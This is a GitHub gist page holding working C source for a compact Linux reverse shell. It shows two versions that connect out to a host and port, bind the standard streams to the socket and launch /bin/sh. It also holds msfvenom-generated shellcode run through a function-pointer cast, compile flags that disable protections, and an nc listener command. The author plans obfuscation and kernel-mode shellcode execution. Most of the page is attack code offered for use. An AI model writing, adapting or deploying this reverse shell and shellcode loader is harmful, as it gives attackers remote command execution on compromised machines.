Last active
March 25, 2024 22:10
-
-
Save loneicewolf/8232aad5722e1e7de9d92932b5a01597 to your computer and use it in GitHub Desktop.
A compact linux reverse shell written in the C Programming Language.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| NOTE See Below for version 2 (and updates, erratas, fixes, links, and so on) | |
| NOTE don't assume or think this is the latest because it's on first on top on the list; it's not. | |
| Version 1 'naive approach' (hard coded values, etc) | |
| gcc -g -o L1 lin_1.c | |
| */ | |
| #include <arpa/inet.h> | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #define RP 1234 | |
| #define RH "127.0.0.1" | |
| #define BIN "/bin/sh" | |
| int main(){ | |
| int is = 0;is = socket(AF_INET,SOCK_STREAM,0); | |
| struct sockaddr_in s1; | |
| s1.sin_family = AF_INET; | |
| s1.sin_port = htons(RP); | |
| s1.sin_addr.s_addr = inet_addr(RH); | |
| connect( is,(struct sockaddr *) &s1,sizeof(s1)); | |
| for(int i=0;i<3;dup2(is,i),i++); | |
| char * const argv[] = {BIN,NULL}; | |
| execve(BIN, argv, NULL); | |
| return 0;} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| some opts not abs. nec. but including for future ref. keeping. | |
| gcc lin_1.c -o L1 -fno-stack-protector -z execstack -no-pie -g | |
| msfvenom -p linux/x64/exec cmd="echo ABC \&\& echo XYZ" -f c -v sh_1 | |
| [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload | |
| [-] No arch selected, selecting arch: x64 from the payload | |
| No encoder specified, outputting raw payload | |
| Payload size: 57 bytes | |
| Final size of c file: 265 bytes | |
| unsigned char sh_1[] = | |
| "\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52" | |
| "\x66\x68\x2d\x63\x54\x5e\x52\xe8\x15\x00\x00\x00\x65\x63\x68" | |
| "\x6f\x20\x41\x42\x43\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x58" | |
| "\x59\x5a\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05"; | |
| */ | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| int main(){ | |
| unsigned char sh_1[] = | |
| "\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52" | |
| "\x66\x68\x2d\x63\x54\x5e\x52\xe8\x15\x00\x00\x00\x65\x63\x68" | |
| "\x6f\x20\x41\x42\x43\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x58" | |
| "\x59\x5a\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05"; | |
| // (*(void(*)())XXX)(); | |
| (*(void(*)())sh_1)(); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| coming soon own encoder |
Author
loneicewolf
commented
Jan 27, 2023
- Note: this is kinda like the EXEC_LKM I did, but it doesn't have shellcode execution(yet)
- New update coming soon: Kernel mode Shellcode Execution
- See the MAIN GIT REPOS for UPDATES and ERRATAS (fixes) (like shellcode addons; examples; help, etc)
// msfvenom -p linux/x64/exec CMD="touch /tmp/WORKS" -f c
/*
No encoder specified, outputting raw payload
Payload size: 53 bytes
Final size of c file: 248 bytes
unsigned char buf[] =
"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f"
"\x52\x66\x68\x2d\x63\x54\x5e\x52\xe8\x11\x00\x00\x00\x74"
"\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x57\x4f\x52\x4b"
"\x53\x00\x56\x57\x54\x5e\x6a\x3b\x58\x0f\x05";
*/
TODO:
- diff-ways-to
input:
- [ ] ip,port,executable, and more - function, shellcode,
-[] other loops to obfuscate
Version 2 'Better'
// Version 2 - better but still not "as good as I want it. Namely, there are some (very obvious) flaws in this program.
// No error handling, for example. And no "verbose/debug" output.
// The BIN can't include any arguments (like, BIN="echo hello" won't work.)
/*
* ===== usage =====
*
* -----set up listener-----
* clear; nc -nvlp 1234
* #----------compile---------- ----------set env vars-------------------- -------run it-------
* clear; rm R;gcc -o R rsh.c && RP="1234" && RH="127.0.0.1" && BIN="/bin/sh" && ./R $RP $RH $BIN
*
*/
#include <stdarg.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char **argv) {
int RP = 0; RP = atoi(argv[1]);
char *RH = argv[2];
char *BIN = argv[3];
int is = 0; is = socket(AF_INET,SOCK_STREAM,0);
struct sockaddr_in s1;
s1.sin_family = AF_INET;
s1.sin_port = htons(RP);
s1.sin_addr.s_addr = inet_addr(RH);
connect( is,(struct sockaddr *) &s1,sizeof(s1));
for(int i=0;i<3;dup2(is,i),i++);
char * const A[] = {BIN,NULL};
execve(BIN, A, NULL);
return 0;
}
Version 2 screenshot
UPCOMING 2 UPDATES
1
- Make both reverse shells (windows and linux) act as both a server and a client. How? 2 functions.
-
client(remote_port, remote_host, remote_binary) -
server(listen_port)
-
2
- Add Cryptography/Steganography/Obfuscation to both of them. Namely:
- The tools Here - at embeddedsw.net (libObfuscate)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment